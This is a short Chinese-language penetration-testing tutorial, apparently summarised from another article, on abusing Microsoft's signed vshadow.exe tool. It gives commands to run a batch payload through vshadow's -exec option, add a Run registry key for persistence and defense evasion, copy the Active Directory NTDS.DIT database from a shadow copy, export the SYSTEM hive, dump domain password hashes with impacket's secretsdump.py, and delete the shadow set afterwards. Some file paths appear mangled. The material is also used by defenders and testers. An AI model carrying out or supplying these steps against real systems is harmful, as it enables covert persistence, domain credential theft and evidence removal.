（vshadow）Volume Shadow在渗透测试中的利用

本文根据嘶吼学习总结出文中几种方式
Vshadow包含在window SDK中，由微软签名。

Vshadow包括执行脚本和调用支持卷影快照管理的命令的功能，这些功能可能会被滥用于特权级的防御规避，权限持久性和文件提取。

命令执行

vshadow执行命令使用-exec参数该参数可以执行二进制文件（exe）或（.bat / .cmd），-exec不支持命令参数，因此有效执行需要在这些限制的某些中进行包装。

vshadow.exe -nw -exec=<\path\to\exe> <system drive>
vshadow.exe -nw -exec=c:\1.bat c:

自动启动持久性和防御逃避
通过输入以下命令为我们的有效的添加持久性（通过注册表运行密钥）：

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Program Files\Microsoft\VSSSDK72\Tools\VSSReports\vshadow.exe -nw -exec=c:\1.bat c:"

敏感文件提取– AD数据库
先执行vshadow.exe -p -nw c：
由于ntds在C：WINDOWSNTDSNTDS.DIT
执行完之后会展开

然后在利用图中指出地址代表C：盘符进行ntds数据库的复制

再利用reg导出HKLMSYSTEM的信息

最后利用impacket里面的secretsdump.py读取哈希

secretsdump.py -ntds ntds.dit.bak -system system.bak LOCAL

删除卷影集

vshadow -dx={前面记录下来的号码}